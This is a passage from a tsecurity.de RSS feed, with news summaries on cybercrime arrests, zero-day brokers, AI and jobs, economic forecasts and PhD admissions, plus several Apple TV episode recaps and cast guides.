<guid isPermaLink="true">https://tsecurity.de/de/3654528/it-nachrichten/china-tells-devs-to-ditch-claude-code-over-backdoor-code-fears/</guid>
<pubDate>Wed, 08 Jul 2026 16:02:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[National vulnerability database claims monitoring mechanism can forward Chinese users' data to remote servers]]></content:encoded>
</item>
<item>
<title><![CDATA[IMF upgrades UK growth forecast as fears over impact of Iran war diminish]]></title>
<description><![CDATA[July update projects GDP growth of 1% this year, making UK the third fastest-growing economy in the G7The International Monetary Fund (IMF) has upgraded its growth forecast for the UK, while leaving those for other G7 countries weaker or unchanged, amid hopes the economic impact of the Iran war m...]]></description>
<link>https://tsecurity.de/de/3654371/ai-nachrichten/imf-upgrades-uk-growth-forecast-as-fears-over-impact-of-iran-war-diminish/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654371/ai-nachrichten/imf-upgrades-uk-growth-forecast-as-fears-over-impact-of-iran-war-diminish/</guid>
<pubDate>Wed, 08 Jul 2026 15:04:31 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>July update projects GDP growth of 1% this year, making UK the third fastest-growing economy in the G7</p><p>The International Monetary Fund (IMF) has upgraded its growth forecast for the UK, while leaving those for other G7 countries weaker or unchanged, amid hopes the economic impact of the Iran war may be less severe than feared.</p><p>In a July update of its World Economic Outlook, which was finalised before the latest <a href="https://www.theguardian.com/world/2026/jul/08/iran-us-war-ceasefire-peace-agreement-strikes-strait-of-hormuz">outbreak of hostilities in the Middle East</a>, the Washington-based organisation projected UK gross domestic product to grow by 1% this year – up 0.2 percentage points from <a href="https://www.theguardian.com/business/2026/apr/14/iran-war-global-recession-imf-uk-growth-forecasts-oil-prices">its April forecast</a>.</p> <a href="https://www.theguardian.com/business/2026/jul/08/imf-upgrades-uk-growth-forecast-as-fears-over-impact-of-iran-war-diminish">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Felons, Fraudsters Flog Offensive Cybersecurity Startup]]></title>
<description><![CDATA[A cybersecurity startup dangling millions of dollars to acquire zero-day security vulnerabilities in popular software is run by a pair of far-right conspiracy theorists and convicted felons whose most recent ventures included fake intelligence companies and a now-defunct AI-based lobbying platfor...]]></description>
<link>https://tsecurity.de/de/3654343/it-security-nachrichten/felons-fraudsters-flog-offensive-cybersecurity-startup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654343/it-security-nachrichten/felons-fraudsters-flog-offensive-cybersecurity-startup/</guid>
<pubDate>Wed, 08 Jul 2026 14:52:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A cybersecurity startup dangling millions of dollars to acquire zero-day security vulnerabilities in popular software is run by a pair of far-right conspiracy theorists and convicted felons whose most recent ventures included fake intelligence companies and a now-defunct AI-based lobbying platform they operated under assumed names.]]></content:encoded>
</item>
<item>
<title><![CDATA[US Teenager Arrested In Finland For Scattered Spider Hacks]]></title>
<description><![CDATA[Peter Stokes, 19, extradited to face criminal conspiracy charges in Chicago federal court, after arrest by Finnish authorities This article has been indexed from Silicon UK Read the original article: US Teenager Arrested In Finland For Scattered Spider Hacks
Read more →
The post US Teenager Arres...]]></description>
<link>https://tsecurity.de/de/3653665/it-security-nachrichten/us-teenager-arrested-in-finland-for-scattered-spider-hacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653665/it-security-nachrichten/us-teenager-arrested-in-finland-for-scattered-spider-hacks/</guid>
<pubDate>Wed, 08 Jul 2026 10:20:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Peter Stokes, 19, extradited to face criminal conspiracy charges in Chicago federal court, after arrest by Finnish authorities This article has been indexed from Silicon UK Read the original article: US Teenager Arrested In Finland For Scattered Spider Hacks</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/us-teenager-arrested-in-finland-for-scattered-spider-hacks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/us-teenager-arrested-in-finland-for-scattered-spider-hacks/">US Teenager Arrested In Finland For Scattered Spider Hacks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 2 Release Date, Time, Plot and Spoilers Ahead]]></title>
<description><![CDATA[Silo Season 3 continues this week with Episode 2, and the story is already moving toward bigger answers about Juliette, Silo 18, and the origins of the underground world. Episode 2 is titled “It’s All Good” and arrives after the Season 3 premiere opened a new chapter for the Apple TV sci-fi drama...]]></description>
<link>https://tsecurity.de/de/3651803/ios-mac-os/silo-season-3-episode-2-release-date-time-plot-and-spoilers-ahead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651803/ios-mac-os/silo-season-3-episode-2-release-date-time-plot-and-spoilers-ahead/</guid>
<pubDate>Tue, 07 Jul 2026 16:11:38 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 continues this week with Episode 2, and the story is already moving toward bigger answers about Juliette, Silo 18, and the origins of the underground world. Episode 2 is titled “It’s All Good” and arrives after the Season 3 premiere opened a new chapter for the Apple TV sci-fi drama.




Series: Silo Season 3



Episode: Season 3 Episode 2



Episode title: It’s All Good



Release date: Friday, July 10, 2026



Release time: 12:00 a.m. PT / 3:00 a.m. ET



Genre: Sci-fi, dystopian drama, mystery



Total episodes: 10



Season 3 start date: July 3, 2026



Season 3 finale date: September 4, 2026





https://www.youtube.com/embed/C9-_VVX9BvE




Plot



Episode 2 is expected to continue Juliette Nichols’ difficult return after the events outside the silo. Season 3 is now dealing with memory loss, unrest inside Silo 18, and the growing truth behind how the silos were created.



Spoilers ahead: The new season also expands the story beyond the present timeline. Viewers will see more of the “Before Times,” where Helen Drew and Daniel Keene begin uncovering a larger conspiracy connected to the world’s collapse and the construction of the silos.



For Episode 2, the main focus should stay on Juliette’s condition, the pressure inside Silo 18, and the early clues that connect the present-day mystery with the past. The episode should also push the season closer to the bigger question fans have been waiting for: who built the silos, and why were people really forced underground?



FAQs



When does Silo Season 3 Episode 2 come out? Silo Season 3 Episode 2 releases on Friday, July 10, 2026, on Apple TV.  What time will Silo Season 3 Episode 2 release? The episode releases at 12:00 a.m. PT and 3:00 a.m. ET in the US.  How many episodes are in Silo Season 3? Silo Season 3 has 10 episodes, with one new episode released every Friday.  When is the Silo Season 3 finale? The Season 3 finale is scheduled for Friday, September 4, 2026.  Is Silo Season 4 happening? Yes, Silo has already been renewed for Season 4, which will conclude the story.  



Silo Season 3 Episode 2 streams on Apple TV this Friday. Apple TV costs $12.99 per month in the US after the free trial. What do you plan to watch next? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsung’s profits jump 19x in a year and you don’t need AI to figure out why]]></title>
<description><![CDATA[Share price down sharply, apparently amid fears the bubble is getting bigger]]></description>
<link>https://tsecurity.de/de/3650807/it-nachrichten/samsungs-profits-jump-19x-in-a-year-and-you-dont-need-ai-to-figure-out-why/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650807/it-nachrichten/samsungs-profits-jump-19x-in-a-year-and-you-dont-need-ai-to-figure-out-why/</guid>
<pubDate>Tue, 07 Jul 2026 09:48:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Share price down sharply, apparently amid fears the bubble is getting bigger]]></content:encoded>
</item>
<item>
<title><![CDATA[Research Universities Are Admitting Fewer PhDs, a Bad Sign For Science]]></title>
<description><![CDATA[An anonymous reader quotes a report from the New York Times: The number of students admitted to Ph.D. programs this fall dropped 15 percent from the previous year, according to data from over 50 top research universities, raising fears that the nation's capacity to produce new science could be di...]]></description>
<link>https://tsecurity.de/de/3650421/it-security-nachrichten/research-universities-are-admitting-fewer-phds-a-bad-sign-for-science/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650421/it-security-nachrichten/research-universities-are-admitting-fewer-phds-a-bad-sign-for-science/</guid>
<pubDate>Tue, 07 Jul 2026 05:37:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from the New York Times: The number of students admitted to Ph.D. programs this fall dropped 15 percent from the previous year, according to data from over 50 top research universities, raising fears that the nation's capacity to produce new science could be diminished. The decline is driven, in part, by a chaotic and unpredictable federal funding environment under the Trump administration, as federal cuts are promised and then reversed, and budgets remain unclear.
 
A reduction in doctoral students could mean fewer scholars at universities to teach and mentor undergraduates. Higher education leaders also worry that, if the declines continue, there will be fewer researchers to power a rapidly evolving scientific work force. The data showing the decrease comes from 55 universities, all of them members of the Association of American Universities, an invitation-only organization that includes 69 of the most prestigious research institutions in the United States. The data collection was conducted by another group, the Association of American Universities Data Exchange.
 
Schools in A.A.U. confer half of the nation's research doctorates, according to the association. "We are at risk of losing a whole generation of new talent because of the reduction in the capacity to support those students," said Toby Smith, a senior vice president at the A.A.U. University leaders and research advocates cite many reasons for the declines in new doctoral students. Key federal agencies, such as the National Institutes of Health and the National Science Foundation, have been funding fewer research grants. The wealthiest institutions also face a new federal tax on their endowments.
 
But the most cited reason in interviews was the unreliable nature of federal funding under the Trump administration. The administration proposed major cuts to federal research agencies last year, but Congress restored the funding. It is again proposing big cuts. While Congress may again reverse the administration's proposed reductions, the uncertainty makes it hard for schools to make multiyear commitments to doctoral students. The administration also abruptly ended thousands of research grants last year, arguing that they did not align with the government's priorities. The administration restored many of the grants after judges deemed the eliminations illegal and arbitrary, but research advocates say the whiplash was damaging.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Research+Universities+Are+Admitting+Fewer+PhDs%2C+a+Bad+Sign+For+Science%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F06%2F228207%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F06%2F228207%2Fresearch-universities-are-admitting-fewer-phds-a-bad-sign-for-science%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/06/228207/research-universities-are-admitting-fewer-phds-a-bad-sign-for-science?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Data From 21,000 Firms Reveals: AI Spending Is Creating Jobs, Not Killing Them]]></title>
<description><![CDATA[New data from Ramp and Revelio show that intensive Gen AI adoption is linked to higher headcount and more entry-level hiring, challenging fears that “AI kills jobs” and reshaping IT leaders’ strategies.
The post Data From 21,000 Firms Reveals: AI Spending Is Creating Jobs, Not Killing Them appear...]]></description>
<link>https://tsecurity.de/de/3649827/it-nachrichten/data-from-21000-firms-reveals-ai-spending-is-creating-jobs-not-killing-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649827/it-nachrichten/data-from-21000-firms-reveals-ai-spending-is-creating-jobs-not-killing-them/</guid>
<pubDate>Mon, 06 Jul 2026 22:48:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>New data from Ramp and Revelio show that intensive Gen AI adoption is linked to higher headcount and more entry-level hiring, challenging fears that “AI kills jobs” and reshaping IT leaders’ strategies.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-ai-spending-hiring-ramp-revelio-study/">Data From 21,000 Firms Reveals: AI Spending Is Creating Jobs, Not Killing Them</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft lays off nearly 5,000 employees across Xbox, commercial sales]]></title>
<description><![CDATA[Microsoft cut around 4,800 roles, or 2.1% of its global workforce, on Monday — the latest in a series of layoffs that’s stoking fears of AI replacing jobs. The layoffs will hit Xbox and commercial sales the hardest.]]></description>
<link>https://tsecurity.de/de/3649192/it-nachrichten/microsoft-lays-off-nearly-5000-employees-across-xbox-commercial-sales/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649192/it-nachrichten/microsoft-lays-off-nearly-5000-employees-across-xbox-commercial-sales/</guid>
<pubDate>Mon, 06 Jul 2026 17:18:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft cut around 4,800 roles, or 2.1% of its global workforce, on Monday — the latest in a series of layoffs that’s stoking fears of AI replacing jobs. The layoffs will hit Xbox and commercial sales the hardest.]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 Identifier Code Used to Arrest 19-Year-Old Over Alleged Ransomware Spree]]></title>
<description><![CDATA[America's Justice Department and FBI teamed joined Finland's National Bureau of Investigation to arrest a teenager they say is part of one of the world's biggest cybercrime syndicates, reports Tom's Hardware. The "Scattered Spider" syndicate has extorted over $100 million in ransom payments, acco...]]></description>
<link>https://tsecurity.de/de/3647085/it-security-nachrichten/windows-11-identifier-code-used-to-arrest-19-year-old-over-alleged-ransomware-spree/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647085/it-security-nachrichten/windows-11-identifier-code-used-to-arrest-19-year-old-over-alleged-ransomware-spree/</guid>
<pubDate>Sun, 05 Jul 2026 20:05:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[America's Justice Department and FBI teamed joined Finland's National Bureau of Investigation to arrest a teenager they say is part of one of the world's biggest cybercrime syndicates, reports Tom's Hardware. The "Scattered Spider" syndicate has extorted over $100 million in ransom payments, according to Department of Justice figures:


19-year-old Peter Stokes is a dual U.S.-Estonian citizen who was trying to board a flight to Japan from Helsinki, when law enforcement caught up with him. [T]he main criminal complaint against Stokes stems from a May 2025 attack on a luxury jewelry dealer based in the United States. The attackers apparently called the company's IT helpdesk using Google Voice, posing as employees. They were able to convince the help desk into resetting their credentials, which allowed them to infiltrate three accounts, two of which had admin privileges. From there, the group, allegedly including Stokes, stole important data and held the jeweler at ransom, demanding an $8 million payment in crypto. The company ultimately regained access to their infrastructure and avoided paying the ransom, but the operational disruption still caused a purported $2 million in losses. This served as the spark that led to Stokes' eventual arrest in Helsinki, as the prosecutors slowly followed the paper and digital trail laid by the attackers. 


Microsoft played a key role in the process by providing GDID [Global Device Identifier] data to the FBI to help them apprehend the alleged criminal... [I]t's a unique identifier assigned to every Windows install that tracks device-specific telemetry. It's the reason why sometimes changing a major component in your PC can revoke your Windows license... [T]he court documents from the case reveal that Stokes used Windows, from which investigators were able to link his physical hardware to specific internet activity and locations... Stokes' web activity, videogame history, IP addresses, tool usage (including Ngrok), Azure status, and more were logged with timestamps, and were provided to the investigators by Microsoft... 

Stokes was carrying two hard drives full of incriminating evidence with him when boarding his flight to Japan... His real identity has actually been known since 2024, but since he was a minor living across Estonia and the UAE at the time, he could only be monitored until the time was right. 

The official criminal complaint even includes a selfie photo that Stokes posted on Snapchat (hiding his face behind dozens of hundred dollar bills). It then notes that behind Stokes the wallpaper, carpet, and furniture match New York's Empire Hotel — and that Stokes had visited the hotel's web site in Germany before then flying to New York... 

"Following the arrest, Stokes was extradited to the U.S., where he appeared in front of a federal court in Chicago for the first time on June 30, 2026, and he remains in custody," adds Tom's Hardware. 

"The accused is now awaiting trial, having been charged with conspiracy, cyber intrusion, and fraud..."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Windows+11+Identifier+Code+Used+to+Arrest+19-Year-Old+Over+Alleged+Ransomware+Spree%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F05%2F1633210%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F05%2F1633210%2Fwindows-11-identifier-code-used-to-arrest-19-year-old-over-alleged-ransomware-spree%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/07/05/1633210/windows-11-identifier-code-used-to-arrest-19-year-old-over-alleged-ransomware-spree?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 2 Spoilers: Juliette’s Memories Could Change Everything]]></title>
<description><![CDATA[Silo Season 3 Episode 2 is already one of the most anticipated Apple TV episodes this week, mainly because Juliette’s memory loss has changed the direction of the story after her return to Silo 18. Season 3 premiered on July 3, 2026, and Episode 2 arrives on July 10, 2026.



Related: Silo Season...]]></description>
<link>https://tsecurity.de/de/3645595/ios-mac-os/silo-season-3-episode-2-spoilers-juliettes-memories-could-change-everything/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645595/ios-mac-os/silo-season-3-episode-2-spoilers-juliettes-memories-could-change-everything/</guid>
<pubDate>Sat, 04 Jul 2026 18:10:01 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 2 is already one of the most anticipated Apple TV episodes this week, mainly because Juliette’s memory loss has changed the direction of the story after her return to Silo 18. Season 3 premiered on July 3, 2026, and Episode 2 arrives on July 10, 2026.



Related: Silo Season 3 Episode 1 Ending Explained: Why Juliette Can’t Remember



The new season continues after the rebellion, but the real twist is Juliette’s condition. She survived her forced cleaning, yet she returns without clear memories, which gives Robert Sims and Camille more room to control the story inside the silo.



Silo Season 3 Episode 2 Could Push Juliette Toward a Dangerous Truth



Spoilers ahead for Silo Season 3 Episode 1.



Juliette is back, but she is not fully herself. Her missing memories make her weaker in front of people who want power, but small flashes from the past can still lead her back to the truth.



Episode 2 is expected to build on this confusion. The biggest tension now is whether Juliette can remember what happened with Bernard, what she saw outside, and why the silo is still hiding so much from its own people.



Season 3 also opens the door to the “Before Times,” showing events from centuries earlier. This storyline follows journalist Helen Drew and Congressman Daniel Keene as they uncover a conspiracy tied to the creation of the silos.



Related: Silo Season 3 Cast Guide: Who Are the New Characters?



That twist makes Episode 2 more important because the show is no longer only about survival underground. It is also about why the world reached this point in the first place.



What Makes Episode 2 So Important?



Episode 2 can move the story in three key directions:



• Juliette may start questioning the version of events being fed to her.



• Sims and Camille may tighten their grip on Silo 18.



• The flashback timeline may reveal more about the original plan behind the silos.



The season has 10 episodes, with new episodes releasing weekly on Fridays until September 4, 2026.



FAQs



When will Silo Season 3 Episode 2 release? Silo Season 3 Episode 2 will release on Friday, July 10, 2026, on Apple TV.  How many episodes are in Silo Season 3? Silo Season 3 has 10 episodes. Apple TV is releasing one new episode every week.  What is the main twist in Silo Season 3? The main twist is Juliette’s memory loss after surviving her forced cleaning. The season also adds a major origin story set centuries before the present timeline.  Is Silo Season 3 connected to the books? Yes, Silo is based on Hugh Howey’s books, and Season 3 uses material linked to Shift and Dust while also expanding parts of the story for TV.  



Silo Season 3 Episode 2 looks ready to deepen the mystery around Juliette, Silo 18, and the origin of the underground world. 



Apple TV costs $12.99 per month in the US. What do you plan to watch next? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sugar Season 2 Latest Episode Recap and Ending Explained]]></title>
<description><![CDATA[Sugar Season 2 has returned on Apple TV with John Sugar pulled deeper into a dangerous Los Angeles mystery. The latest episode, Season 2 Episode 3, “Watch Face,” follows Sugar after the shooting and pushes the case toward gang violence, police corruption, and Ji Moon’s strange disappearance.




...]]></description>
<link>https://tsecurity.de/de/3645111/ios-mac-os/sugar-season-2-latest-episode-recap-and-ending-explained/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645111/ios-mac-os/sugar-season-2-latest-episode-recap-and-ending-explained/</guid>
<pubDate>Sat, 04 Jul 2026 11:21:58 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sugar Season 2 has returned on Apple TV with John Sugar pulled deeper into a dangerous Los Angeles mystery. The latest episode, Season 2 Episode 3, “Watch Face,” follows Sugar after the shooting and pushes the case toward gang violence, police corruption, and Ji Moon’s strange disappearance.




Episodes: 8 episodes



Genre: Mystery, drama, neo-noir, sci-fi



Started airing: June 19, 2026



Finale date: August 7, 2026



Latest episode: Episode 3, “Watch Face,” released July 3, 2026




Spoilers ahead for Sugar Season 2 Episode 3.







The episode begins right after Sugar survives the attack on his life. His recovery is quick because of his alien blood treatment, but the shooting makes it clear that someone wants him away from the Ji Moon case.



Sugar continues looking into the EZ4 gang and tries to find Guapo, the person linked to the violence around Chuy’s death and Ji’s disappearance. At the same time, Ji finally appears again and contacts Danny, but the meeting goes wrong when Ji mistakes Sugar for a cop and runs away.



The ending becomes more intense when Sugar reaches Guapo. Before Sugar can get real answers, a police raid breaks out and Guapo is killed. The biggest clue comes from a watch, which connects the raid to a corrupt officer and suggests that the danger around Ji goes much higher than one gang.



The episode ends by making Sugar’s case larger than a missing person mystery. Ji is alive, Danny is being pulled toward a risky boxing opportunity, and Sugar now has stronger reason to believe that the police, the gangs, and the hidden “Fire Sale” thread are connected.



Ending Explained



The ending shows that Guapo was never the full answer. His death removes one lead, but it also exposes the larger cover-up around the case.



The watch is the key detail. It links the violent men around the case to someone inside law enforcement, which means Sugar is not just dealing with street-level crime. He is moving toward a conspiracy that can protect itself from inside the system.



Ji running away also matters. He is scared, unstable, and clearly hiding something, but he is not just a victim waiting to be saved. His actions suggest he knows more about the people chasing him, and Danny’s Vegas fight offer may be part of the same trap.



FAQs



When did Sugar Season 2 Episode 3 release? Sugar Season 2 Episode 3, titled “Watch Face,” released on July 3, 2026, on Apple TV.  How many episodes are in Sugar Season 2? Sugar Season 2 has 8 episodes, with new episodes releasing weekly until August 7, 2026.  Is Ji Moon alive in Sugar Season 2 Episode 3? Yes, Ji Moon appears alive in Episode 3, but he escapes after thinking Sugar is a cop.  What does the watch mean in Sugar Season 2 Episode 3? The watch points toward police corruption and connects the ending to the larger mystery around the “Fire Sale” thread.  



Sugar Season 2 is streaming on Apple TV in the US, Apple TV costs $12.99 per month after the trial. What do you plan to watch next? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 1 Ending Explained: Why Juliette Can’t Remember]]></title>
<description><![CDATA[Silo Season 3 Episode 1 opens with Juliette Nichols back at the center of the story, but she is no longer the same person viewers followed through the first two seasons. The premiere focuses on her memory loss, the unrest inside the silo, and a new timeline that begins to explain how the whole sy...]]></description>
<link>https://tsecurity.de/de/3645087/ios-mac-os/silo-season-3-episode-1-ending-explained-why-juliette-cant-remember/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645087/ios-mac-os/silo-season-3-episode-1-ending-explained-why-juliette-cant-remember/</guid>
<pubDate>Sat, 04 Jul 2026 11:09:12 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 1 opens with Juliette Nichols back at the center of the story, but she is no longer the same person viewers followed through the first two seasons. The premiere focuses on her memory loss, the unrest inside the silo, and a new timeline that begins to explain how the whole system started.



Silo Season 3 Episode 1 Recap



The episode picks up after Juliette survives her forced cleaning and returns to Silo 18. People now see her as a symbol of hope, especially after the rebellion and the chaos caused by Bernard’s rule.



Related: Silo Season 3 Cast Guide: Who Are the New Characters?



However, Juliette does not remember everything clearly. She struggles to recognize people, understand what happened, and explain what she saw outside. This makes her return more dangerous because the truth about the other silos still remains hidden.



Inside the silo, Judge Sims and Camille gain more control. Their actions show that they want to keep Juliette quiet before she can expose anything that changes the balance of power.



What Happens To Bernard?



One major shock comes when the episode reveals that Bernard is dead. Sims and Camille are connected to his death, and this changes the leadership structure inside Silo 18.



With Bernard gone, Juliette unexpectedly becomes mayor. This gives people hope, but it also puts her in a difficult position because she cannot fully trust her own memory.



The Before Times Timeline Explained



Season 3 also introduces a new story set before the silos existed. This timeline follows Congressman Daniel Keene and journalist Helen Drew as they begin uncovering a dangerous conspiracy.



This part of the episode expands the show beyond Silo 18. It shows that the mystery of the silos is tied to decisions made long before Juliette’s time.



Silo Season 3 Episode 1 Ending Explained



The ending focuses on Juliette’s broken memory and the question of identity. Her confusion is not random. The episode suggests that someone has used memory-suppressing drugs to stop her from revealing the truth.



The phrase “Who are you?” becomes important because it connects Juliette’s condition with the larger mystery in the past timeline. The show hints that memory control may be one of the biggest tools used to keep people trapped, obedient, and unaware.



Final Thoughts



Silo Season 3 Episode 1 sets up a darker and more complex chapter for the Apple TV+ series. Juliette’s return should have been a victory, but her memory loss turns it into another mystery.



The premiere gives fans new questions about the origin of the silos, the role of Sims and Camille, and the truth Juliette is still trying to remember.]]></content:encoded>
</item>
<item>
<title><![CDATA[Maximum Pleasure Guaranteed Finale is Almost Here, Here’s What Episode 10 Could Reveal]]></title>
<description><![CDATA[Maximum Pleasure Guaranteed Episode 10 is almost here, and the finale is expected to bring Paula’s messy investigation to a turning point. The Apple TV dark comedy thriller will close its 10-episode first season on July 15, 2026.



Paula’s Investigation May Finally Pay Off



The show follows Pa...]]></description>
<link>https://tsecurity.de/de/3644906/ios-mac-os/maximum-pleasure-guaranteed-finale-is-almost-here-heres-what-episode-10-could-reveal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644906/ios-mac-os/maximum-pleasure-guaranteed-finale-is-almost-here-heres-what-episode-10-could-reveal/</guid>
<pubDate>Sat, 04 Jul 2026 08:38:38 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Maximum Pleasure Guaranteed Episode 10 is almost here, and the finale is expected to bring Paula’s messy investigation to a turning point. The Apple TV dark comedy thriller will close its 10-episode first season on July 15, 2026.



Paula’s Investigation May Finally Pay Off



The show follows Paula, a newly divorced mother who gets pulled into a dangerous web of blackmail, murder, and youth soccer after believing she witnessed a crime.



Episode 10 should bring more clarity to the mystery that has followed her since the beginning. Paula has spent the season chasing answers while dealing with a custody battle and her own identity crisis.



The finale will likely reveal whether Paula was right about the crime or whether someone has been carefully controlling what she sees.



The Custody Battle Could Take A Big Turn



Paula’s personal life has been just as chaotic as the main mystery. Her conflict with Karl and Mallory has kept the emotional tension high, especially as Mallory crossed legal lines earlier in the season.



Episode 10 could show whether Paula’s choices hurt her custody case or help her prove that she has been fighting for the truth.



The Bigger Conspiracy May Come Out



The series has slowly expanded beyond one possible crime. With detectives, secrets, and suspicious characters surrounding Paula, the finale may expose a larger setup.



Key things Episode 10 could reveal:



QuestionWhat It MeansWho is behind the blackmail?This can explain the season’s biggest threatWas the murder real?Paula’s credibility depends on itWhat happens to Karl and Mallory?Their choices affect Paula’s familyIs Season 2 being teased?The ending may leave one door open



Maximum Pleasure Guaranteed Episode 10 should give viewers the answers they have been waiting for while keeping the show’s dark humor alive. The finale arrives on Apple TV on July 15, 2026.]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Cast Guide: Who Are the New Characters?]]></title>
<description><![CDATA[Silo Season 3 introduces several important new characters as the story expands beyond the underground silos and explores the events that led to their creation. The new cast plays a major role in revealing the mystery behind the world of Silo while continuing Juliette's journey.



Season 3 follow...]]></description>
<link>https://tsecurity.de/de/3644197/ios-mac-os/silo-season-3-cast-guide-who-are-the-new-characters/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644197/ios-mac-os/silo-season-3-cast-guide-who-are-the-new-characters/</guid>
<pubDate>Fri, 03 Jul 2026 20:09:40 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 introduces several important new characters as the story expands beyond the underground silos and explores the events that led to their creation. The new cast plays a major role in revealing the mystery behind the world of Silo while continuing Juliette's journey.



Season 3 follows two timelines. One continues the present-day story inside the silos, while the other takes viewers hundreds of years into the past to show how everything began. This shift brings several fresh faces who become central to the overall story.



New Characters in Silo Season 3




Ashley Zukerman as Daniel Keene

A young congressman with a military engineering background.



He starts uncovering secrets connected to the silo project.



Daniel first appeared briefly in the Season 2 finale before becoming a series regular.





Jessica Henwick as Helen Drew

A determined investigative journalist based in Washington, D.C.



She works alongside Daniel as they investigate a growing conspiracy before the apocalypse.



Helen is one of the biggest new additions this season.





Jessica Brown Findlay as Charlotte Keene

Daniel's sister and a former naval aviator.



Her storyline becomes important as the series explores the early events that shaped the future.





Laura Innes as Senator Thurman

A powerful political leader who plays a key role in the events before the silos were built.



Her decisions influence the larger conspiracy revealed in Season 3.





Morven Christie as Anna Thurman

The senator's daughter.



She becomes involved in the political and personal conflicts during the "Before Times" storyline.





Colin Hanks

Colin Hanks joins the cast in a recurring role connected to the pre-apocalypse timeline.



His character gradually becomes part of the expanding mystery surrounding the silos. 





Reed Birney and Matt Craven

Both actors join Season 3 in undisclosed roles.



Their characters are expected to support the flashback storyline and its larger mystery. 






Returning Main Cast



Fans will also see many familiar faces return, including:




Rebecca Ferguson as Juliette Nichols



Common as Robert Sims



Harriet Walter as Martha Walker



Chinaza Uche as Paul Billings



Avi Nash as Lukas Kyle



Steve Zahn as Solo



